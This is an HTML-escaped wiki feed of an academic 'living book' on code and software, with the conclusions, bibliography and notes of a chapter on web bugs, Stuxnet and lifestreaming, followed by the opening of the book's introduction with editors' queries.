&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers [Eds: does an 'and' need to be inserted here?] carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. [Eds: again, do you need to provide some examples of these important questions?] However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways are life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also [Eds: 'also' is repeated a number of times here] useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4709</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4709"/>
		<updated>2012-04-18T14:37:21Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
